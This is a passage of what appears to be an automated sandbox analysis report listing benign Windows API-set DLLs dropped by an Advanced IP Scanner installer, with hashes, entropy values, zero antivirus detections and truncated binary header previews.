Preview:	<.d....!..`...B..........A....;.......;...k...;.......;.......;..1n...O..C....[..@x...^..#....^..=J..(5......G.......H,..;...K.......N:......V...2..._...D...............;'...y..;{.......o..............Ab...t.......t..;....t..C....../T...j......5t...!..@...0...H5..B...f...#.......30.......m.......E...~..%....`..(....e..C'......CK.......H. =...3...y......y......%...F..0...q.+.......+......+....@.+....\.+.......G.......G.......H0...Cq.Hw9.....Hw9.....I.....Z.J6......J6......J6......J6...5..LD......L.b..C..M.S../..R.....@.V....#..Wi...B..W.T.....Z.\|..<e.[f3..?R.gc......w0K..4...H...........Db...T......."..'....~..(... d..3....T.."...2....+......Bj......G7.9.E.....L.#..IK.M$o.....e.....^.l8...(E...^..5...I...........0.......=.......B-..>......>...2..3..#G..l...7&........5.l..Fi.AV....#.y....@....0..=.......<.......A...tb..'.......................=.......-.......:..(....=p.1V......R....$..W.<..F..f.~...&......&...1........^..'....5...Q..........c..3..;6...H..q.J..:...I....i..I

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.960788331628294
Encrypted:	false
SSDEEP:	192:bvmMWVghW/ivSx9YOCAs/nGfe4pBjSf+GEOWNArXVWQ4mWPQ4mqnajxcRGlPMRdk:XW2hWKSUA0GftpBjxDib4mll7PedGSk
MD5:	37DA7F6961082DD96A537235DD89B114
SHA1:	DAA1E2E683FA0512FF68EB686D80B4AA3B42E5B6
SHA-256:	6EE46C6B6727EB77BCBCDD54DC506680CA34AF7BC7CA433B77775DE90358844E
SHA-512:	AF4F28E3319344D2E215F56026E9CEE5C951B5C44374C7EEEA6790D18F174D7E785CEACBBF1450D5CA1D76F207B5F7B4F24674468F30BE84C6C3E90C48CE2A2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................+............ ...................<..............8............................................................................text...;........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.97464085764015
Encrypted:	false
SSDEEP:	192:sZWVghW/Y7l9YOCAs/nGfe4pBjSfXVJ4WNArXVWQ4mWGqnajxcRGlPMRd54kft:4W2hWQ7QA0GftpBjcqRll7PedGkft
MD5:	3B3BD0AD4FEA16AB58FCAEAE4629879C
SHA1:	EB175F53640FB8AC4028A7657BBF48823A535677
SHA-256:	DCB9CF7E31D6772434C683353A1514F10D87D39FEAA9B3EDF3FA983B2988294C
SHA-512:	F206E7F56A218A1725F212B20416210C228E60D0D3C44F9A598C93ACB10BF8A3C961B4C4D104AE0F166598BE5C5102A1FF77A39D2B70743E784F69C82FD4C730
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@.......................................... ...................<..............8............................................................................text... ........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.982441576564087
Encrypted:	false
SSDEEP:	384:NvW2hW+77QA0GftpBjuYvd0WrlI663Upe:NR9yi866kQ
MD5:	584766DF684B2AD2A3A5B05A5B457FAC
SHA1:	C207B7AEDB8D978C8320A1454331519A8365F20D
SHA-256:	B15964D49A2C5219E0923137AA9028611BE81FDBDCBB0D43BB3AAA23114E401F
SHA-512:	3BC7D49F997E489466858A21DAA22B397ADB8E736D7E064542ED5F73CD87B52CBD412CDEC2B4B892F9231C2562E24C8DEBAB73054E878405F2B2A022E86D26B8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......!h....@.......................................... ...................<..............8............................................................................text...+........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.00674396465633
Encrypted:	false
SSDEEP:	192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
MD5:	906CB0C8ABA8342D552B0F37DDFD475F
SHA1:	A3CD528B9C212FEA97495A557A91D638B1608418
SHA-256:	582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
SHA-512:	27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22208
Entropy (8bit):	6.906399541614446
Encrypted:	false
SSDEEP:	192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
MD5:	779A8B14C22E463EA535CBCA9EA84D49
SHA1:	4620531D5291878C10D6E3974F240B98BC7FB4B9
SHA-256:	FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
SHA-512:	08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......6....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.98650705248822
Encrypted:	false
SSDEEP:	192:7WVghWu7vSx9YOCAs/nGfe4pBjSby+ggmGWNArXVWQ42WHmMqnaj9RlS6VSyS:7W2hWmSUA0GftpBj+1bMlBRAkS3
MD5:	F6D1216E974FB76585FD350EBDC30648
SHA1:	F8F73AA038E49D9FCF3BD05A30DC2E8CBBE54A7C
SHA-256:	348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271
SHA-512:	756EE21BA895179A5B6836B75AEEFB75389B0FE4AE2AAFF9ED84F33075094663117133C810AB2E697EC04EAFFD54FF03EFA3B9344E467A847ACEA9F732935843
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......W5....@.............................L............ ...................<..............8............................................................................text...\........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.046229749504995
Encrypted:	false
SSDEEP:	192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
MD5:	BFB08FB09E8D68673F2F0213C59E2B97
SHA1:	E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
SHA-256:	6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
SHA-512:	E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	6.993015464813673
Encrypted:	false
SSDEEP:	192:6YOWVghW/KgbXH9YOCAs/nGfe4pBjSfSAWNArXVWQ4mW/M2qnaj9RlS6VRob:EW2hWSgbCA0GftpBj8qRlBRAka
MD5:	FC68978ABB44E572DFE637B7DD3D615F
SHA1:	47D0F1BD5195CE10C5EC06BDB92E85DDA21CDAB3
SHA-256:	DF6BED7BCCCAF7298133DF99E497FA70DA761BE99C2A5B2742CFC835BF62D356
SHA-512:	7EB601D7482DDDC251898D7EFBDFE003BAB460AF13B3CB12F1D79FDF9D9D26FC9048FD8CA9969B68BBE5547FDCD16F59D980527A5B73B02DA145419834234873
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@............................._............ ...................<..............8............................................................................text...o........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.95985126360952
Encrypted:	false
SSDEEP:	384:8l6W2hWJ7QA0GftpBj8VbJOAlXBtFwA+S:p+yi2VbJy4
MD5:	1CD8672D8C08B39560A9D5518836493E
SHA1:	C7CE2330265D07D88AD15F80DD88473F3DAAFCD0
SHA-256:	4A5F33A0837A9D9F22D49EE6D062BAE671A4C5C5522DB6FFE03C1AA2C0BD008E
SHA-512:	6BCE6EF09746C10E3B3F136BB2CE67002F27FF70C3FCBA48E7F1C3769000A62649A41FD82ACBE2A819B8ECE96D8E9399B15104CA2B40F65B51A0C84FC2A7901C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.9718846004654225
Encrypted:	false
SSDEEP:	384:8vlYsFeW2hWu7QA0GftpBjECp4DlXBtFwCf:8izyiChyG
MD5:	B8BB783DEE4EA95576882625C365E616
SHA1:	E9AF4B17FC082B5D717BFA013D46DA4BDFFB2CD3
SHA-256:	21BD55B9D42A5FAA5FA3C5DD9FAD1665DF3C33557CC4F7A58248A88B69D372B8
SHA-512:	B756468DCF7254FD31D3650F794B837724A82207001B521105BE05DF4CF187785897BE8377083C53A92C0DC5AEE2CDAF8B9538FD6944E0AC4BE5D286836037A1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......`....@.......................................... ...................<..............8............................................................................text...$........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.018574692016083
Encrypted:	false
SSDEEP:	384:CbvuBL3BuW2hWO7QA0GftpBjvEcDflBRAkgD:7BL3BGfyidRA1
MD5:	44CA070DC5C09FF8588CF6CDCB64E7A2
SHA1:	63D1DA68CD984532217BEACC21B868B46EC5D910
SHA-256:	EDEB5B3003DB4EE3767FA012E812323FADEF67663C1B45FED3FCA96CAD5AECC8
SHA-512:	C3A214550993A56907AA35091112F9F89E0A74375A7C268133A7C06D88E5DE4F9C87F7E0BE5007F00081A772DF724590D38966ED465F92217D3EF2F45A29C237
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21184
Entropy (8bit):	6.98505637818331
Encrypted:	false
SSDEEP:	384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
MD5:	3B9D034CA8A0345BC8F248927A86BF22
SHA1:	95FAF5007DAF8BA712A5D17F865F0E7938DA662B
SHA-256:	A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
SHA-512:	04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	6.986049300390525
Encrypted:	false
SSDEEP:	192:CYaBWVghW/B7l9YOCAs/nGfe4pBjSfaMjWNArXVWQ4mW6qnajMHxxBNT0662ONLD:IBW2hWZ7QA0GftpBjj21lI663Un
MD5:	FC13F11A2458879B23C87B29C2BAD934
SHA1:	68B15CC21F5541DC2226E9E967E08AF81D04A537
SHA-256:	624841916513409C3CFCF45589EB96548C77B829E5D56A5783249D3AB7DC8998
SHA-512:	801A23485E42CC224E508212E7114E89747543A20964CF666EE801FCC2FEA97888FAA1AF8DA2AF807C50187969A08C6FCE2A021836811786EF72F4C2BDBDE33C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................l............ ...................<..............8............................................................................text...\|........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.04628745407397
Encrypted:	false
SSDEEP:	192:bhkd6WVghW/vt7l9YOCAs/nGfe4pBjSfWP18gWNArXVWQ4mW0tXqnajL1dHx3tKU:aYW2hWt7QA0GftpBj7PS8rxlXBtFwVoF
MD5:	07954AF744363F9807355E4E9408DF45
SHA1:	B37D06B39EB7186B55CEAE25427B7AB95E46E32F
SHA-256:	4B20AAF0E3B7566B797652F8D84B749AB23F7D1557DBA882C0590FE1BE98CED6
SHA-512:	B7A7C16EF8BE62D9F562DCECF01B2AD1C066DE92AA4CA7A8C7BB93A80B1BC781F8A6A47F51A252E40337BD8D7778CACFEE7488A5FAD15F11D24C90572AD0E4C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19648
Entropy (8bit):	6.961454559139268
Encrypted:	false
SSDEEP:	192:GkZjWVghW/WgbXH9YOCAs/nGfe4pBjSfr4i6wWNArXVWQ4mWQVUqnajMHxxBNT0u:fjW2hWegbCA0GftpBjc4aolI663Ub2
MD5:	39556E904FA2405ABAF27231DA8EF9E5
SHA1:	89DB01B04DFDBE5C0F5E856050611A6A72F1AFD0
SHA-256:	5F476627A904B182D9B3F142594DEFA267DB3CE8206BAC24AF063A29635B3A8B
SHA-512:	558C0D0DD0CE24C7DCDEBAE64578E09ACC36A86B6F121266A147394DD9E8F8B2B81726B9CCC24ED07755950CD13C1D34CAB137E995D0BE25EBF52699D0FBB6B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......B.....@......................... ...G............ ...................<..............8............................................................................text...g........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.988142648004873
Encrypted:	false
SSDEEP:	384:0Ok1JzNcKSIxW2hWFSUA0GftpBjluF3sBlvQyURz8o:0pcKSCUi++rvU2o
MD5:	39047E168FFBDD19185504633D6ECA29
SHA1:	FE3423689EFEDADA19C7DEC3D5DD077A057BF379
SHA-256:	611B3E36AD3E0045AB4170A5D4E2D05FD2A26DDE2F7B09EA51F4264E263A544B
SHA-512:	8B7D38726E302CDCF5A296E50CCC969B2B122432B93E2B5D1D1F4C1B6C2B3A9B64AF79BB65A7A9EAC31F563AE60934458F9316DD5CBB071FB0A3AD180FAC6103
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......~.....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.000917619737006
Encrypted:	false
SSDEEP:	192:QgxDfIeJWVghW/c7l9YOCAs/nGfe4pBjSfxyWNArXVWQ4mWgBHqnaj9RlS6V6Qg:JDfIeJW2hWk7QA0GftpBjxdBHlBRAky
MD5:	C2EAD5FCCE95A04D31810768A3D44D57
SHA1:	96E791B4D217B3612B0263E8DF2F00009D5AF8D8
SHA-256:	42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62
SHA-512:	C90048481D8F0A5EDA2EB6E7703B5A064F481BB7D8C78970408B374CB82E89FEBC2E36633F1F3E28323FB633D6A95AA1050A626CB0CB5EC62E9010491AAE91F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	7.0782836442636174
Encrypted:	false
SSDEEP:	384:MZeW2hWngbCA0GftpBjPEGVlvQyURz87X:3n8ixEQvU2L
MD5:	7697F94ED76B22D83D677B999EDFC2E1
SHA1:	42AFB5B8E76B8B77D845156B7124CC3E0C613F91
SHA-256:	50FD585270FA79FD056EC04B6991D0E65CCA28C1116834A59D5591F8D8C2C214
SHA-512:	1EF120BAA532692D22F8939D9F149035E38DA6B65B889BA6CCB7858596718D569B0B9B35AD3609DE9DAF229553254966BF3D5A6ABC4AF1FF56732CE8560B31C8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18112
Entropy (8bit):	7.072469017642331
Encrypted:	false
SSDEEP:	384:mG1W2hWhSUA0GftpBjy6oNxll7PedGitM/:mGTgio6CJkGcG
MD5:	FDF0B4BF0214585E18EE2F6978F985B0
SHA1:	0FE247F8CCA0C04729135EE612FBFCED92D59D9D
SHA-256:	CF42C1215695579ADE1842246EC43DA9A9B28E8107957C0C340CE3BA9F689584
SHA-512:	D0A249C230520538E8C2759CC0A41444C543DABD6347C8A8231C587EBBA28905AD2DF5E5D6437881C7A02F6DE6212A719ACCA2F6D30F63F8D7A21A26921A1807
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.021897050678374
Encrypted:	false
SSDEEP:	384:5yMvJW2hW2gbCA0GftpBjMv3ulvQyURz8n:5yMvn88ikEvU2n
MD5:	687533A89B43510CCE4D8B2ECB261AA0
SHA1:	4004BA63880A92042C106FF6A549C6F5F69CE05D
SHA-256:	E7272FF3B00508732896BF96F8DAB5AD32FE4531746AB1C228C315F1B4D48156
SHA-512:	6A61DD13939BF61342278EFFA07D2654219032F9523D3D552275BD60BD3B125DAD13737924D33F6619C5A7CCACE008B37C3330451411D3BD09E1D2B5064F9AAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......A....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20672
Entropy (8bit):	6.936138213943514
Encrypted:	false
SSDEEP:	384:wdv3V0dfpkXc0vVafW2hWqSUA0GftpBjjQjclvQyURz82u6:wdv3VqpkXc0vVaBziRvU22u6
MD5:	88C4CA509C947509E123F22E5F077639
SHA1:	AE837C556FF23B9E166288A11E409D21BDDDA4ED
SHA-256:	0787FD3D9606B8614F9073C5F04CC6CB153BBF2992297CEBB8C537C066A78C9F
SHA-512:	3CCE8C4EA63019ADC6383D5DA7F5969B0B10A55CEEF29083E21F04D23377305325C5CB5F4656955F8ABB5A1E10BEEAC60808DE9D03A72462950469AE49768418
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......a.....@.............................V............ ...................<..............8............................................................................text...f........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)

Download File

